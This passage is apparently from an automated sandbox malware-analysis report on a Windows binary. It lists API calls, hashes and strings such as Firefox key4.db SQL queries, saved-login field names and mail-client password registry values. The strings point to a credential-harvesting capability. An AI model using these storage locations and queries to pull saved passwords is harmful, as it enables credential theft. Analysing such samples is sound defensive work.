                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                • memset.MSVCRT ref: 0040E858
                                                                                                                                                                • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                • API String ID: 4171719235-3943159138
                                                                                                                                                                • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                                • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                                • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                                • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                • GetDC.USER32 ref: 004104E2
                                                                                                                                                                • strlen.MSVCRT ref: 00410522
                                                                                                                                                                • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                                • API String ID: 1703216249-3046471546
                                                                                                                                                                • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                                                                • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                                • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                                                                • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 004024F5
                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                • _mbscpy.MSVCRT ref: 00402533
                                                                                                                                                                • _mbscpy.MSVCRT ref: 004025FD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                • API String ID: 168965057-606283353
                                                                                                                                                                • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                                • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                                • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                                • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 00402869
                                                                                                                                                                  • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                • _mbscpy.MSVCRT ref: 004028A3
                                                                                                                                                                  • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040297B
                                                                                                                                                                  • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                • API String ID: 1497257669-167382505
                                                                                                                                                                • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                                                                • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                                                                • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                                                                • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                                                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                                                                • memset.MSVCRT ref: 0040FCFD
                                                                                                                                                                • memset.MSVCRT ref: 0040FD1D
                                                                                                                                                                • memset.MSVCRT ref: 0040FD3B
                                                                                                                                                                • memset.MSVCRT ref: 0040FD54
                                                                                                                                                                • memset.MSVCRT ref: 0040FD72
                                                                                                                                                                • memset.MSVCRT ref: 0040FD8B
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                                                                • memset.MSVCRT ref: 0040FE45
                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                                                                • memcpy.MSVCRT ref: 0040FE82
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040FEA4
                                                                                                                                                                • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                                                                • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                                                                Strings
                                                                                                                                                                • {Unknown}, xrefs: 0040FD02
                                                                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                • API String ID: 1428123949-3474136107
                                                                                                                                                                • Opcode ID: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                                                                                                                                                • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                                                                                                • Opcode Fuzzy Hash: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                                                                                                                                                • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                • memset.MSVCRT ref: 0040128E
                                                                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2998058495-0
                                                                                                                                                                • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                                • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                                • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                                • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                  • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                                                                • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                                                                • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                                                                • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                                                                • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                                                                • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                                                                                                                                • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                                                                • strlen.MSVCRT ref: 0040BEFE
                                                                                                                                                                • strlen.MSVCRT ref: 0040BF0C
                                                                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                                                                  • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                                                                  • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                                                                • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                                                                • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                                                                • memset.MSVCRT ref: 0040BFDB
                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                • API String ID: 2303586283-933021314
                                                                                                                                                                • Opcode ID: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                                                                                                                                                • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                                                                                                • Opcode Fuzzy Hash: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                                                                                                                                                • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                                • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                • API String ID: 231171946-2189169393
                                                                                                                                                                • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                                • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                • API String ID: 633282248-1996832678
                                                                                                                                                                • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                                • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                                • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                                • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                • , xrefs: 00406834
                                                                                                                                                                • key4.db, xrefs: 00406756
                                                                                                                                                                • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                • API String ID: 3614188050-3983245814
                                                                                                                                                                • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                                • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040A973
                                                                                                                                                                • memset.MSVCRT ref: 0040A996
                                                                                                                                                                • memset.MSVCRT ref: 0040A9AC
                                                                                                                                                                • memset.MSVCRT ref: 0040A9BC
                                                                                                                                                                • sprintf.MSVCRT ref: 0040A9F0
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040AA37
                                                                                                                                                                • sprintf.MSVCRT ref: 0040AABE
                                                                                                                                                                • _mbscat.MSVCRT ref: 0040AAED
                                                                                                                                                                  • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040AAD2
                                                                                                                                                                • sprintf.MSVCRT ref: 0040AB21
                                                                                                                                                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76DC0A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76DC0A60), ref: 00406D4D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                • API String ID: 710961058-601624466
                                                                                                                                                                • Opcode ID: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                                                                • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                                                                • Opcode Fuzzy Hash: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                                                                • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 0000008A.00000002.56237187879.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                • API String ID: 3402215030-3842416460
                                                                                                                                                                • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                                • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                                • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                                • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                  • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                                                                  • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                                                                                                                                                  • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                                                                                                                                                  • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                                                                                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                                                                                                                                                  • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                • memset.MSVCRT ref: 0040F187
                                                                                                                                                                • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040F2CD
                                                                                                                                                                • _mbscpy.MSVCRT ref: 0040F30E
